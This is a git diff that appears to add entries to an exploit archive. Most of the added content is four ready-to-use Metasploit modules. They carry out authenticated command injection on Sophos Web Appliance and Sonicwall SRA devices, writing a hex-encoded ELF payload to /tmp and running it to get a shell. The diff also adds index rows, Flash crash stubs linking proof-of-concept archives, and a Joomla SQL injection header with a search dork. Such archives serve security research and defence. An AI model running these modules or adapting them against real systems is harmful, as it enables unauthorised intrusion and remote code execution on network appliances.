diff --git a/files.csv b/files.csv
index 025b36f6a..6ad985f3f 100644
--- a/files.csv
+++ b/files.csv
@@ -5372,6 +5372,13 @@ id,file,description,date,author,platform,type,port
41365,platforms/windows/dos/41365.txt,"NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission",2017-02-15,"Google Security Research",windows,dos,0
41367,platforms/windows/dos/41367.txt,"GOM Player 2.3.10.5266 - '.fpx' Denial of Service",2017-02-15,"Peter Baris",windows,dos,0
41369,platforms/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos,0
+41417,platforms/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",windows,dos,0
+41418,platforms/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",windows,dos,0
+41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
+41420,platforms/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",multiple,dos,0
+41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
+41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
+41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -37320,3 +37327,17 @@ id,file,description,date,author,platform,type,port
41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
+41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0
+41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41406,platforms/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41407,platforms/php/webapps/41407.txt,"Joomla! Component Eventix Events Calendar 1.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41408,platforms/php/webapps/41408.txt,"Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41409,platforms/php/webapps/41409.txt,"Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41410,platforms/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41411,platforms/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41412,platforms/php/webapps/41412.txt,"Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
+41413,platforms/hardware/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
+41414,platforms/hardware/webapps/41414.rb,"Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)",2016-12-12,xort,hardware,webapps,0
+41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
+41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
+41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
diff --git a/platforms/hardware/webapps/41404.html b/platforms/hardware/webapps/41404.html
new file mode 100755
index 000000000..e4512046c
--- /dev/null
+++ b/platforms/hardware/webapps/41404.html
@@ -0,0 +1,33 @@
+
+ Digisol Router CSRF Exploit - Indrajith A.N
+
+
+
+
+
diff --git a/platforms/hardware/webapps/41413.rb b/platforms/hardware/webapps/41413.rb
new file mode 100755
index 000000000..01f300856
--- /dev/null
+++ b/platforms/hardware/webapps/41413.rb
@@ -0,0 +1,176 @@
+# Exploit Title: Sophos Web Appliance UnBlock/Block-IP Remote Command Injection Vulnerablity
+# Date: 12/12/2016
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.sophos.com
+# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx
+# Version: 4.2.1.3
+# Tested on: 4.2.1.3
+#
+# CVE : CVE-2016-9553
+
+# vuln 1: unblockip parameter / MgrReport.php exploit
+# vuln 2: blockip parameter / MgrReport.php exploit
+
+# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sophos Web Appliace <= v4.2.1.3 block/unblock remote exploit',
+ 'Description' => %q{
+ This module exploits two 2 seperate remote command injecection vulnerabilities in
+ the Sophos Web Appliace Version <= v4.2.1.3 the web administration interface.
+ By sending a specially crafted request it's possible to inject system
+ commands
+ },
+ 'Author' =>
+ [
+ 'xort', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 2 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ [
+ 'blockip method',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'VulnName' => 'blockip',
+ 'VulnNum' => '1',
+ },
+ ],
+ [
+ 'unblockip method',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'VulnName' => 'unblockip',
+ 'VulnNum' => '2',
+ },
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+
+ def do_login(username, password_clear)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 11550;
+ style_key = Rex::Text.rand_text_hex(32)
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/index.php",
+ 'vars_get' => {
+ 'c' => 'login',
+ },
+ 'vars_post' =>
+ {
+
+ 'STYLE' => style_key,
+ 'destination' => '',
+ 'username' => username,
+ 'password' => password_clear,
+ }
+ }, timeout)
+
+ return style_key
+ end
+
+ def run_command(username, style_password, cmd)
+ vprint_status( "Running Command...\n" )
+
+ # random attack method from calling methods into
+ calling_commands = [ 'report','trend_volume','trend_suspect','top_app_ctrl','perf_latency','perf_throughput','users_browse_summary','traf_sites','traf_blocked','traf_users','users_virus_downloaders','users_pua_downloaders','users_highrisk','users_policy_violators','users_top_users_by_browse_time','users_quota','users_browse_time_by_user','users_top_users_by_category','users_site_visits_by_user','users_category_visits_by_user','users_monitored_search_queries','users_app_ctrl','traf_category','traf_download' ,'warned_sites' ]
+
+ # select random calling page that calls the vulnerable page MgrReport.php where the vulns are
+ attack_method = calling_commands[rand(calling_commands.length)]
+
+ # random filename to dump too + 'tmp' HAS to be here.
+ b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
+
+ vprint_status( "Attacking Vuln #" + target['VulnNum']+ " - " + target['VulnName'] + " with " + attack_method + "command method" )
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => '/index.php?c=trend_suspect&' + target['VulnName'] + '=1.2.3.6`'+ cmd +'`&STYLE='+style_password
+ })
+
+ end
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # params
+ password_clear = datastore['PASSWORD']
+ user = datastore['USERNAME']
+
+ style_hash = do_login(user, password_clear)
+
+ vprint_status("STATUS hash authenticated: #{style_hash}\n")
+
+ sleep(5)
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(user, style_hash, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\x\1\2')
+
+ # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
+ run_command(user, style_hash, ("echo%20-e%20#{encoded_elf}\>%20/tmp/m\;chmod%20%2brx%20/tmp/m\;/tmp/m"))
+ # wait for magic
+ handler
+
+ end
+
+
+ end
+end
diff --git a/platforms/hardware/webapps/41414.rb b/platforms/hardware/webapps/41414.rb
new file mode 100755
index 000000000..2dda1497e
--- /dev/null
+++ b/platforms/hardware/webapps/41414.rb
@@ -0,0 +1,168 @@
+# Exploit Title: Sophos Web Appliance diagnostic_tools wget Remote Command Injection Vulnerablity
+# Date: 12/12/2016
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.sophos.com
+# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx
+# Version: 4.2.1.3
+# Tested on: 4.2.1.3
+#
+# CVE : CVE-2016-9554
+
+# vuln: diagnostic_tools command / host parameter / MgrReport.php exploit
+
+# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sophos Web Appliace <= v4.2.1.3 remote exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Sophos Web Appliace Version <= v4.2.1.3. The vulnerability exist in
+ a section of the machine's adminstrative infertface for performing diagnostic
+ network test with wget and unsanitized unser supplied information.
+ },
+ 'Author' =>
+ [
+ 'xort@Critical Start', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+ style_key = Rex::Text.rand_text_hex(32)
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/index.php",
+ 'vars_get' => {
+ 'c' => 'login',
+ },
+ 'vars_post' =>
+ {
+
+ 'STYLE' => style_key,
+ 'destination' => '',
+ 'section' => '',
+ 'username' => username,
+ 'password' => password_clear,
+ }
+ }, timeout)
+
+ return style_key
+ end
+
+ def run_command(username, style_password, cmd)
+
+ vprint_status( "Running Command...\n" )
+
+ # send request with payload
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'action' => 'wget',
+ 'section' => 'configuration',
+ 'STYLE' => style_password ,
+ 'url' => 'htt%3a%2f%2fwww.google.com%2f`'+cmd+'`',
+ },
+ 'vars_get' => {
+ 'c' => 'diagnostic_tools',
+ },
+ })
+
+ end
+
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # params
+ password_clear = datastore['PASSWORD']
+ user = datastore['USERNAME']
+
+ # do authentication
+ style_hash = do_login(user, password_clear)
+
+ vprint_status("STATUS hash authenticated: #{style_hash}\n")
+
+ # pause to let things run smoothly
+ sleep(5)
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(user, style_hash, ("sudo%20/bin/rm%20-f%20/tmp/n%20;printf%20\"#{encoded_cmd}\"%20>%20/tmp/n;%20chmod%20+rx%20/tmp/n;/tmp/n" ))
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\x\1\2')
+
+ # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
+ run_command(user, style_hash, ("echo%20-e%20#{encoded_elf}\>%20/tmp/m\;chmod%20%2brx%20/tmp/m\;/tmp/m"))
+
+ # wait for magic
+ handler
+
+ end
+
+
+ end
+# sophox-release
+end
diff --git a/platforms/hardware/webapps/41415.rb b/platforms/hardware/webapps/41415.rb
new file mode 100755
index 000000000..4bb2f6710
--- /dev/null
+++ b/platforms/hardware/webapps/41415.rb
@@ -0,0 +1,208 @@
+# Exploit Title: Sonicwall extensionsettings scriptname Remote Command Injection Vulnerablity
+# Date: 12/25/2016
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.sonicwall.com
+# Software Link: sonicwall.com/products/sra-virtual-appliance
+# Version: 8.1.0.2-14sv
+# Tested on: 8.1.0.2-14sv
+#
+# CVE : (awaiting cve)
+
+# vuln: extensionsettings.cgi / scriptfile (filename) parameter /
+
+# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
+ a section of the machine's adminstrative infertface for performing configurations
+ related to on-connect scripts to be launched for users's connecting.
+ },
+ 'Author' =>
+ [
+ 'xort@Critical Start', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+ style_key = Rex::Text.rand_text_hex(32)
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/userLogin",
+ 'headers' => {
+ 'Connection' => 'close',
+ 'Content-Type' => 'application/x-www-form-urlencoded',
+ 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
+ },
+ 'vars_post' => {
+ 'username' => username,
+ 'password' => password_clear,
+ 'domain' => 'LocalDomain',
+ 'loginButton' => 'Login',
+ 'state' => 'login',
+ 'login' => 'true',
+ 'VerifyCert' => '0',
+ 'portalname' => 'VirtualOffice',
+ 'ajax' => 'true'
+ },
+ }, timeout)
+
+ swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
+
+ return swap
+ end
+
+ def run_command_spliced(username, swap_cookie, cmd)
+
+ vprint_status( "Running Command...\n" )
+
+ # send request with payload
+ res = send_request_cgi({
+ 'method' => 'GET',
+# 'uri' => "/cgi-bin/diagnostics?currentTSREmailTo=|#{cmd}|x&tsrEmailCurrent=true",
+ 'uri' => "/cgi-bin/diagnostics",
+ 'vars_get' => {
+ 'tsrEmailCurrent' => 'true',
+ 'currentTSREmailTo' => '|'+cmd+'|x',
+ },
+ 'headers' => {
+ 'Cookie' => 'swap='+swap_cookie+';',
+ 'Content-Type' => 'text/plain; charset="iso-8859-1"',
+ 'Connection' => 'close',
+ },
+ }, 30 )
+
+ end
+
+ def run_command(username, swap_cookie, cmd)
+
+ write_mode = ">"
+ dump_file = "/tmp/qq"
+
+ # base64 - encode with base64 so we can send special chars and multiple lines
+ #cmd_encoded = Base64.strict_encode64(cmd)
+
+ cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ vprint_status("cmd_encoded = #{cmd_encoded}")
+
+ for cmd_chunk in cmd_encoded.split(/(....................................................................................................)/)
+
+ cmd_new = "printf%20\"#{cmd_chunk}\"#{write_mode}#{dump_file}"
+ #cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}".gsub("+", "_")
+
+ # set to normal append for loops after the first round
+ if write_mode == ">"
+ write_mode = ">>"
+ end
+
+ # add cmd to array to be exected later
+ run_command_spliced(username, swap_cookie, cmd_new)
+
+ end
+
+ # execute payload stored at dump_file
+
+ run_command_spliced(username, swap_cookie, "chmod%20777%20/tmp/qq;sh%20/tmp/qq")
+
+ end
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # params
+ password_clear = datastore['PASSWORD']
+ user = datastore['USERNAME']
+
+ # do authentication
+ swap_cookie = do_login(user, password_clear)
+
+ vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+ vprint_status("encoded_cmd = #{encoded_cmd}")
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(user, swap_cookie, ("sudo /bin/rm -f /tmp/n;printf \"#{encoded_cmd}\">/tmp/n;chmod +rx /tmp/n;/tmp/n" ))
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+ vprint_status("encoded_elf = #{encoded_elf}")
+
+ # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
+ run_command(user, swap_cookie, ("echo -e \"#{encoded_elf}\"\>/tmp/m\;chmod +rx /tmp/m\;/tmp/m"))
+
+
+ # wait for magic
+ handler
+
+ end
+
+
+ end
+# sophox-release
+end
diff --git a/platforms/hardware/webapps/41416.rb b/platforms/hardware/webapps/41416.rb
new file mode 100755
index 000000000..dc74edb51
--- /dev/null
+++ b/platforms/hardware/webapps/41416.rb
@@ -0,0 +1,195 @@
+# Exploit Title: Sonicwall viewcert.cgi CGI Remote Command Injection Vulnerablity
+# Date: 12/24/2016
+# Exploit Author: xort @ Critical Start
+# Vendor Homepage: www.sonicwall.com
+# Software Link: sonicwall.com/products/sra-virtual-appliance
+# Version: 8.1.0.2-14sv
+# Tested on: 8.1.0.2-14sv
+#
+# CVE : (awaiting cve)
+
+# vuln: viewcert.cgi / CERT parameter
+
+# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
+#
+# xort @ Critical Start
+
+
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv viewcert.cgi remote exploit',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerability in
+ the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
+ a section of the machine's adminstrative infertface for performing configurations
+ related to on-connect scripts to be launched for users's connecting.
+ },
+ 'Author' =>
+ [
+ 'xort@Critical Start', # vuln + metasploit module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ [ 'none', 'none'],
+ ],
+ 'Platform' => [ 'linux'],
+ 'Privileged' => true,
+ 'Arch' => [ ARCH_X86 ],
+ 'SessionTypes' => [ 'shell' ],
+ 'Privileged' => false,
+
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ }
+ },
+
+ 'Targets' =>
+ [
+ ['Linux Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ false, 'Device password', "" ]),
+ OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
+ OptString.new('CMD', [ false, 'Command to execute', "" ]),
+ Opt::RPORT(443),
+ ], self.class)
+ end
+
+ def do_login(username, password_clear)
+ vprint_status( "Logging into machine with credentials...\n" )
+
+ # vars
+ timeout = 1550;
+
+ # send request
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/userLogin",
+ 'headers' => {
+ 'Connection' => 'close',
+ 'Content-Type' => 'application/x-www-form-urlencoded',
+ 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
+ },
+ 'vars_post' => {
+ 'username' => username,
+ 'password' => password_clear,
+ 'domain' => 'LocalDomain',
+ 'loginButton' => 'Login',
+ 'state' => 'login',
+ 'login' => 'true',
+ 'VerifyCert' => '0',
+ 'portalname' => 'VirtualOffice',
+ 'ajax' => 'true'
+ },
+ }, timeout)
+
+ swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
+
+ return swap
+ end
+
+
+ def run_command(swap_cookie, cmd)
+
+ # vars
+ timeout = 1550;
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/viewcert",
+ 'data' => "buttontype=delete&CERT=newcert-1`#{cmd}`",
+ 'headers' =>
+ {
+ 'Cookie' => "swap=#{swap_cookie}",
+ },
+ }, timeout)
+ end
+
+ def run_command_spliced(swap_cookie, cmd)
+
+ write_mode = ">"
+ dump_file = "/tmp/qq"
+ reqs = 0
+
+ cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ for cmd_chunk in cmd_encoded.split(/(....................................)/)
+
+ cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}"
+ reqs += 1
+
+ vprint_status("Running Command (#{reqs})\n")
+
+ # set to normal append for loops after the first round
+ if write_mode == ">"
+ write_mode = ">>"
+ end
+
+ # add cmd to array to be exected later
+ run_command(swap_cookie, cmd_new)
+ end
+# vprint_status("Running Final Command ...\n")
+
+ # execute payload stored at dump_file
+ run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq")
+
+ end
+
+ def exploit
+ # timeout
+ timeout = 1550;
+
+ # params
+ password_clear = datastore['PASSWORD']
+ user = datastore['USERNAME']
+
+ # do authentication
+ swap_cookie = do_login(user, password_clear)
+
+ vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
+
+ #if no 'CMD' string - add code for root shell
+ if not datastore['CMD'].nil? and not datastore['CMD'].empty?
+
+ cmd = datastore['CMD']
+
+ # Encode cmd payload
+ encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+ # kill stale calls to bdump from previous exploit calls for re-use
+ run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
+
+ else
+ # Encode payload to ELF file for deployment
+ elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+ encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
+
+
+ run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m")
+ # wait for magic
+ handler
+ end
+ end
+end
diff --git a/platforms/multiple/dos/41420.txt b/platforms/multiple/dos/41420.txt
new file mode 100755
index 000000000..20c33c451
--- /dev/null
+++ b/platforms/multiple/dos/41420.txt
@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1018
+
+There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on a server and visit http://127.0.0.1/LoadMP4.swf?file=unsigned.mp4.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41420.zip
diff --git a/platforms/multiple/dos/41421.txt b/platforms/multiple/dos/41421.txt
new file mode 100755
index 000000000..281e699a8
--- /dev/null
+++ b/platforms/multiple/dos/41421.txt
@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1013
+
+The attached fuzzed swf causes stack corruption when it is loaded, likely due to the parsing of the SWF file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41421.zip
diff --git a/platforms/multiple/dos/41422.txt b/platforms/multiple/dos/41422.txt
new file mode 100755
index 000000000..92149b0e4
--- /dev/null
+++ b/platforms/multiple/dos/41422.txt
@@ -0,0 +1,7 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1007
+
+The attached swf causes a use-after-free in applying bitmap filters.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41422.zip
diff --git a/platforms/multiple/dos/41423.txt b/platforms/multiple/dos/41423.txt
new file mode 100755
index 000000000..b1cc6b175
--- /dev/null
+++ b/platforms/multiple/dos/41423.txt
@@ -0,0 +1,9 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1008
+
+The attached FLV file causes a heap overflow in YUVPlane decoding.
+
+To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/LoadMP4.swf?file=yvplane.flv.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41423.zip
diff --git a/platforms/php/webapps/41405.txt b/platforms/php/webapps/41405.txt
new file mode 100755
index 000000000..06b28f191
--- /dev/null
+++ b/platforms/php/webapps/41405.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component J-HotelPortal v6.0.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jhotelreservation
+# Date: 21.02.2017
+# Vendor Homepage: http://www.cmsjunkie.com/
+# Software Buy: http://www.cmsjunkie.com/joomla-hotel-portal
+# Demo: http://hoteldemo.cmsjunkie.com/j3/portal/
+# Version: 6.0.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
